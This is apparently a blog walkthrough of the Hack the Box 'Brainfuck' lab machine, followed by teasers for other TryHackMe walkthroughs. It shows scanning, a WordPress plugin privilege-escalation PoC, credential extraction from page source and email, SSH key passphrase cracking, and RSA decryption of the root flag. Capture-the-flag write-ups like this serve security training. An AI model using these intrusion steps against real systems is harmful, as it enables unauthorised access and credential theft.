Hack the Box - Brainfuck - Walkthrough

Introduction

Today we're going to be doing a pentest walkthrough of the Brainfuck machine hosted at https://hackthebox.eu . For this pentest, we'll be using a Kali Linux virtual machine as our attacking system and the Brainfuck machine as the victim system.  After connecting to the Hack the Box network via VPN, we see that our target is located at 10.129.96.96.

Scanning and Enumeration

We'll start by scanning for open ports with Nmap:

sudo nmap -T4 -p- 10.129.96.96


Now we'll do another Nmap scan, this time specifying the ports and picking up service names and version numbers:

sudo nmap -T4 -p22,25,110,143,443 10.129.96.96


Seeing that there's an HTTPS service open, we'll use Nmap scripts to enumerate the SSL certificate:

nmap --script=ssl* -p443 10.129.96.96


We see three URLs associated with the certificate, so we'll add those URLs to our /etc/hosts file so that those addresses resolve properly in our web browser:

sudo gedit /etc/hosts


Now we can navigate to the first URL on the SSL cert to see what's there.

https://brainfuck.htb



Looking at the webpage, we see that the site is using Wordpress, which is notorious for its vulnerabilities.  We also see that the blog entry on the page indicates an admin user on the Wordpress service, and an email address associated with the site, as well as a potential username, orestis,  for other services on the system.  

Next, enumerate the Wordpress CMS by looking at the page's source:

view-source:https://brainfuck.htb/


We see that among the plugins installed, there's the Responsive Ticket System, version 7.1.3. Also, the installed version of Wordpress is 4.7.3.

Finding a Way In

Let's use Searchsploit to look for vulnerabilities associated with the Responsive Ticket System plugin:

searchsploit responsive ticket system


Let's take a look at this privilege escalation exploit:

cat /usr/share/exploitdb/exploits/php/webapps/41006.txt



It looks like if we write this PoC code into an html file and execute it in our web browser, we'll be able to authenticate into the Wordpress app as a known user.  Let's create our malicious html file, remembering to modify the PoC to match our target:

gedit evilWP.html


Now to execute the malicious file in our web browser:

file:///home/kali/evilWP.html


We click the Login button and are redirected to the admin-ajax.php page.  Now if we navigate back to the root website, we should be logged in as the admin user.

https://brainfuck.htb


After looking around on the Wordpress site, we find ourselves at the plugins page:

https://brainfuck.htb/wp-admin/plugins.php


The frontpage of the blog mentioned that SMTP plugin was implemented.  The plugin's settings should include some credentials:

https://brainfuck.htb/wp-admin/options-general.php?page=swpsmtp_settings


We see that the orestis user and its SMTP password is included in the settings, but we can't see what the password is.  Let's take a look at this page's source:

view-source:https://brainfuck.htb/wp-admin/options-general.php?page=swpsmtp_settings

In the page source, the password is not obfuscated.  Now that we have email credentials for the orestis user, we can use these credentials to break into the email account through the IMAP service.

telnet 10.129.96.96 143
a login orestis kHGuERB29DNiNE



Now, that we're logged in, let's take a look at our email folders:

a list “” “*”
a select inbox

We hit paydirt with the second email.

a fetch 2 body[]


We discovered a secret-related URL when we enumerated the SSL certificate from earlier, so let's navigate there:

https://sup3rs3cr3t.brainfuck.htb


From here, we'll attempt to authenticate into the forum with the credentials found in the email from earlier:

orestis / kIEnnfEKJ#9UmdO



Here we see a couple of forum threads in here.  Let's take a look at the SSH Access thread first:

https://sup3rs3cr3t.brainfuck.htb/d/2-ssh-access




One thing we take note of here is how orestis signs off each of his messages with the same tagline.  Next, we'll look at the other thread:

https://sup3rs3cr3t.brainfuck.htb/d/3-key




If we assume that orestis is still signing off their messages with the same tagline, we see that the ciphertext string where the tagline would be is different in each of orestis' messages in this thread.  That means that if these messages are using a substitution cipher, it isn't a Caesar cipher, otherwise the ciphertext tagline would be the same for each message.

If this is a substitution cipher, it could be a Vigenere cipher, where the ciphertext changes depending on how many characters the message is. 

We can use the following Python script to determine what the key is for a Vigenere cipher, provided we have a long enough plaintext to ciphertext translation.

#!/usr/bin/env python

# requires a sufficiently long sample of plaintext and ciphertext 


plaintext = "OrestisHackingforfunandprofit"  # change this

ciphertext = "QbqquzsPnhekxsdpifcafhfzdmgzt"  # change this

key = ""


for i in range(len(plaintext)):

num_key = ((ord(ciphertext[i]) - ord(plaintext[i])) % 26) + 97

char_key = chr(num_key)

key = key + char_key

 

print key

The result of running the script is this:

python VigenereKeyFinder.py


Because keys in Vigenere ciphers repeat, we can deduce that the key is fuckmybrain.  Now that we have the key, we can use the following website to help us decipher the messages from the forum:

https://cryptii.com/pipes/caesar-cipher

First, we switch the cipher type from Caesar cipher to Vigenere cipher



Next, we change the key from cryptii to fuckmybrain.


Lastly, we switch the mode from ENCODE to DECODE.

With this all set-up, we can paste the ciphertext forum messages into the deciphering webpage one at a time, resulting in the following output:






From this exchange, we obtain a URL that appears to lead to an rsa key.  We will have to replace the ip address here with the one we've been assigned (10.129.96.96). Let's navigate there now:

https://10.129.96.96/8ba5aa10e915218697d1c658cdee0bb8/orestis/id_rsa


We download the file, and cat it out:

cat /home/kali/Downloads/id_rsa

<snipped>

Looks like an SSH private key alright.  The forum messages implied that there was a password associated with the SSH key, so we'll have to crack the password using John the Ripper.  Before we do that, we'll need to convert the data from the SSH key using a Python script called ssh2john.py.  On Kali Linux, that script is located at /usr/share/john/ssh2john.py.

sudo python ssh2john.py id_rsa > ssh4john.txt


We can crack the ssh4john.txt file with John the Ripper now.  In our case, we use a Windows system to crack the password:

john ssh4john.txt -wordlist=rockyou.txt

Now we have everything we need to login to the target directly using SSH.  Before we do that, however, we'll need to change the file permissions on our captured id_rsa file.

chmod 600 id_rsa

And now to login:

ssh -i id_rsa orestis@10.129.96.96
passphrase: 3poulakia!


Capturing the User Flag

We'll take this opportunity to obtain the user.txt flag on this target.  For Hack the Box's Linux systems, this is usually located in a user's home directory, so we'll just cat it out now:

cat user.txt


Foothold Enumeration

ls -la

Let's take a look at the encrypt.sage file:

cat encrypt.sage

orestis@brainfuck:~$ cat encrypt.sage

nbits = 1024


password = open("/root/root.txt").read().strip()

enc_pass = open("output.txt","w")

debug = open("debug.txt","w")

m = Integer(int(password.encode('hex'),16))


p = random_prime(2^floor(nbits/2)-1, lbound=2^floor(nbits/2-1), proof=False)

q = random_prime(2^floor(nbits/2)-1, lbound=2^floor(nbits/2-1), proof=False)

n = p*q

phi = (p-1)*(q-1)

e = ZZ.random_element(phi)

while gcd(e, phi) != 1:

    e = ZZ.random_element(phi)




c = pow(m, e, n)

enc_pass.write('Encrypted Password: '+str(c)+'\n')

debug.write(str(p)+'\n')

debug.write(str(q)+'\n')

debug.write(str(e)+'\n')


After some analysis, we find that this script is using the value of the target system's root.txt flag and performing RSA encryption on it.  In addition, the script provides the output of a number of the RSA variables (p, q, and e) to the debug.txt file and the encrypted root.txt file at output.txt.  We're not super great with cryptography, but given these parameters, someone else has written a script to solve the initial value at the following URL:

https://crypto.stackexchange.com/questions/19444/rsa-given-q-p-and-e

Collecting the Root Flag

Using that script as a base, we can modify it to include the values we find in the output.txt and debug.txt files, as well as print out the decrypted value of root.txt in ASCII at the end:

#!/usr/env/python


def egcd(a, b):

    x,y, u,v = 0,1, 1,0

    while a != 0:

        q, r = b//a, b%a

        m, n = x-u*q, y-v*q

        b,a, x,y, u,v = a,r, u,v, m,n

        gcd = b

    return gcd, x, y


def main():


    p = 7493025776465062819629921475535241674460826792785520881387158343265274170009282504884941039852933109163193651830303308312565580445669284847225535166520307

    q = 7020854527787566735458858381555452648322845008266612906844847937070333480373963284146649074252278753696897245898433245929775591091774274652021374143174079

    e = 30802007917952508422792869021689193927485016332713622527025219105154254472344627284947779726280995431947454292782426313255523137610532323813714483639434257536830062768286377920010841850346837238015571464755074669373110411870331706974573498912126641409821855678581804467608824177508976254759319210955977053997

    ct = 44641914821074071930297814589851746700593470770417111804648920018396305246956127337150936081144106405284134845851392541080862652386840869768622438038690803472550278042463029816028777378141217023336710545449512973950591755053735796799773369044083673911035030605581144977552865771395578778515514288930832915182


    # compute n

    n = p * q


    # Compute phi(n)

    phi = (p - 1) * (q - 1)


    # Compute modular inverse of e

    gcd, a, b = egcd(e, phi)

    d = a


    print( "n:  " + str(d) );


    # decrypt ciphertext

    pt = pow(ct, d, n)

    print( "pt: " + str(pt) )


    # print flag value in ASCII

    flag = hex(pt)

    flag = str(flag[2:-1])

    print flag.decode("hex")


if __name__ == "__main__":

    main()

Now to run the script and receive the root flag:

python rsa_decrypt.py


Summary

After initial scans, we found that the target's SSL certificate pointed us to multiple URLs hosted on the server.  One of the URLs had a vulnerable version of Wordpress installed, so we exploited Wordpress to gain Admin access to the app.  Enumeration of plugins on the app led to discovery of email credentials, which we used to access the host's IMAP service and obtain credentials for a forum hosted on another URL hosted on the server.  Authenticated into that forum led us to a weakly ciphered forum thread, which we were able to decipher, and led us to a file hosted on the target which contained an SSH private key with a weak passphrase.  After cracking the passphrase through brute force, we logged into the target through SSH and found a script in a user's directory which encrypted the value of our objective flag file, but revealed several variables used for the encryption process, which we able to utilized in writing and running a decryption script.  When run, this script provided us with the decrypted string value of the root flag.

Finish




Comments

Post a Comment

Popular posts from this blog

TryHackMe - Windows PrivEsc - Walkthrough

Image
Introduction Today we're going to be doing a walkthrough for the Windows PrivEsc room hosted at https://tryhackme.com/room/w indows10privesc . For this walkthrough, we'll be using two virtual machines (VMs), a Kali Linux VM as our attacking machine, and the deployed Windows 10 client as the the victim machine. Task 1 - Deploy the Vulnerable Windows VM Press the green button here: The Windows machine should come online after a minute or two. The IP address of the machine can be found here: Of course, the actual IP address will probably be a different one from the one in the screenshot.  For the examples, however, we will use the IP address of 10.10.227.113 RDP should be available on port 3389 (it may take a few minutes for the service to start). You can login to the "user" account using the password "password321": xfreerdp /u:user /p:password321 /cert:ignore /v:10.10.227.113 Questions: Deploy the Windows VM and login using the "user" ...
Read more

TryHackMe - Reversing Elf - Walkthrough

Image
Introduction Today we're going to be doing a walkthrough for the Reversing ELF room hosted at https://tryhackme.com/room/ reverselfiles . For this walkthrough, we'll be using one virtual machine (VMs), a Kali Linux VM as our attacking machine. Task 1 - Crackme1 Questions What is the flag? Download the Task 1 Task File Copy it to your working directory Give the file executable permissions Run the file chmod +x crackme1 ./crackme1 Task 2 - Crackme2 Questions What is the super secret password ? Give the file executable permissions Run Ltrace on the file with a test string chmod +x crackme2 ltrace ./crackme2 test ./crackme2 passwordFoundInPreviousStep Task 3 - Crackme3 Questions What is the flag? Give the file executable permissions Run strings on the file Echo the base64 string you found, pipe it into Base64 decode chmod +x crackme3 strings crackme3 echo “ base64stringFoundInPreviousStep ” | base64 -d Task 4 - Crackme4 Questions What is the password ? Give the file execu...
Read more

TryHackMe - Web Enumeration - Walkthrough

Image
Introduction Today we're going to be doing a walkthrough for the Web Enumeration room hosted at https://tryhackme.com/room/ webenumerationv2 . For this walkthrough, we'll be using two virtual machines (VMs), the TryHackMe AttackBox VM as our attacking machine, and the deployed vulnerable Web clients as the the victim machines. Task 1 - Introduction Questions: Let's get started No answer needed Task 2 - Manual Enumeration Questions I gotcha! No answer needed Task 3 - 1. introduction to Gobuster Questions No questions No answer needed Task 4 - 1.1 Gobuster Modes Questions I get the hang of it! No answer needed Task 5 - 1.2 Useful Wordlists Questions No questions No answer needed Task 6 - 1.3 Practical: Gobuster (Deploy #1) Questions Run a directory scan on the host. Other than the standard css, images and js directories, what other directories are available? echo “10.10.164.99 webenum.thm” >> /etc/hosts gobuster dir -t 16 -u http://webenum.thm -w /usr/sha...
Read more